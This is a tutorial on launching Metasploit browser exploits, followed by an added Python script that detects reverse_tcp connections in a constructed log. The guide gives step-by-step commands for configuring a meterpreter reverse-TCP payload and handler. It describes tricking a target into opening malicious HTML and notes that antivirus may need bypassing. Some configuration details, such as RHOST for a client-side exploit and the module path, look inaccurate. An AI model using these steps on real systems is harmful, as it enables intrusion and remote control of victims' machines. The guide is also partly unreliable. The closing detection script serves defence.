Metasploit: Browser Exploits

TL;DR

This guide shows you how to use Metasploit’s browser exploit modules to test the security of your systems. We’ll cover searching for exploits, setting up a handler, and launching attacks against vulnerable browsers.

Setting Up Your Environment

  1. Start Metasploit: Open your terminal and run msfconsole to launch the Metasploit console.

Finding Browser Exploits

  1. Search for exploits: Use the search command with keywords like ‘browser’, ‘firefox’, ‘chrome’, or specific CVEs (Common Vulnerabilities and Exposures). For example:
    search browser firefox
  2. Review results: Metasploit will display a list of matching exploits. Pay attention to the ‘Rank’ column (Excellent, Good, Average), which indicates exploit reliability. Also note the ‘Type’ column; we’re focusing on ‘exploit’.

Launching an Exploit

  1. Use the exploit: Select an exploit using the use command. For example:
    use exploit/multi/browser_client_side/firefox_css_injection
  2. Configure options: Use the info command to see available options for the chosen exploit.
    info
  3. Set necessary options: The most important option is usually ‘RHOST’ (Remote Host) – set this to the IP address of your target machine. You might also need to configure ‘LHOST’ (Local Host), which is *your* IP address.
    set RHOST 192.168.1.100
    set LHOST 192.168.1.50
  4. Set payload: Choose a payload that will give you access to the target machine. Common payloads include ‘meterpreter/reverse_tcp’. Use the show payloads command to see available options.
    set PAYLOAD meterpreter/reverse_tcp
  5. Set LPORT: Specify the local port for the payload connection. A common choice is 4444.
    set LPORT 4444

Setting Up a Handler

  1. Start the handler: Before launching the exploit, start a listener to catch incoming connections from the payload. Open a second msfconsole instance and run:
    use exploit/multi/handler
  2. Configure handler options: Set ‘PAYLOAD’ to match the one you chose for the exploit (e.g., meterpreter/reverse_tcp) and ‘LHOST’ to your IP address.
    set PAYLOAD meterpreter/reverse_tcp
    set LHOST 192.168.1.50
  3. Run the handler: Start listening for connections with the run command.
    run

Launching the Attack

  1. Run the exploit: Go back to your original Metasploit console (where you configured the browser exploit) and run the exploit command.
    run
  2. Deliver the exploit: The method for delivering the exploit depends on the module. Some exploits require you to create a malicious HTML file that you trick the target into opening. Others might work through vulnerabilities in specific websites or browser extensions.
  3. Verify connection: If successful, the handler console will display a meterpreter session when the target opens the malicious content.
    [*] Sending stage (1792 bytes) to 192.168.1.100
    meterpreter > sessions -l

Important Considerations

  • Legal restrictions: Always obtain explicit permission before testing the security of any system. Unauthorized access is illegal and unethical.
  • Firewalls & Antivirus: Firewalls and antivirus software can block exploits. You may need to bypass these protections for successful testing.
  • Browser Updates: Keep your browsers up-to-date, as updates often include security patches that address known vulnerabilities.
  • Cyber security best practices: Regularly scan your systems for vulnerabilities and implement appropriate security measures.
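
Seen from the defender's side, the reverse_tcp session described in this guide is an outbound TCP connection from the workstation running the browser to LHOST:LPORT. The following added example (not part of the original guide) flags such connections in a constructed connection log; the CSV layout, the browser list and the web-port list are assumptions to adapt to your own telemetry.

```python
import csv
import io
import ntpath

# Assumptions for this example (tune for your environment):
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
WEB_PORTS = {80, 443, 8080, 8443}   # ports a browser normally talks to
GUIDE_LPORT = 4444                  # the "common choice" named in the guide

# Constructed sample: outbound TCP connection events as CSV
# (time, host, process image, destination IP, destination port).
SAMPLE_LOG = """\
2024-05-01T10:00:01Z,WS01,C:\\Program Files\\Mozilla Firefox\\firefox.exe,203.0.113.10,443
2024-05-01T10:00:07Z,WS01,C:\\Program Files\\Mozilla Firefox\\firefox.exe,192.168.1.50,4444
2024-05-01T10:02:13Z,WS02,C:\\Windows\\System32\\svchost.exe,192.168.1.50,4444
2024-05-01T10:03:40Z,WS03,C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe,192.168.1.77,9001
2024-05-01T10:04:00Z,WS03,truncated-line
"""


def classify(process, dst_port):
    """Return (severity, reason) for one connection, or None if unremarkable."""
    is_browser = ntpath.basename(process).lower() in BROWSERS
    if is_browser and dst_port == GUIDE_LPORT:
        return "high", "browser process connected to common reverse_tcp port"
    if dst_port == GUIDE_LPORT:
        return "medium", "connection to common reverse_tcp port"
    if is_browser and dst_port not in WEB_PORTS:
        return "medium", "browser process connected to non-web port"
    return None


def find_suspect_connections(log_text):
    """Parse the CSV events and return a list of finding dicts."""
    findings = []
    for row in csv.reader(io.StringIO(log_text)):
        if len(row) != 5 or not row[4].isdigit():
            continue  # skip malformed or truncated records
        time, host, process, dst_ip, dst_port = row
        verdict = classify(process, int(dst_port))
        if verdict:
            findings.append({"time": time, "host": host, "dst": f"{dst_ip}:{dst_port}",
                             "severity": verdict[0], "reason": verdict[1]})
    return findings


if __name__ == "__main__":
    for f in find_suspect_connections(SAMPLE_LOG):
        print(f["severity"].upper(), f["host"], f["dst"], f["reason"])
```

A port match alone is a weak signal because LPORT is freely configurable; the browser-to-non-web-port rule is the one that still fires when a different port is chosen.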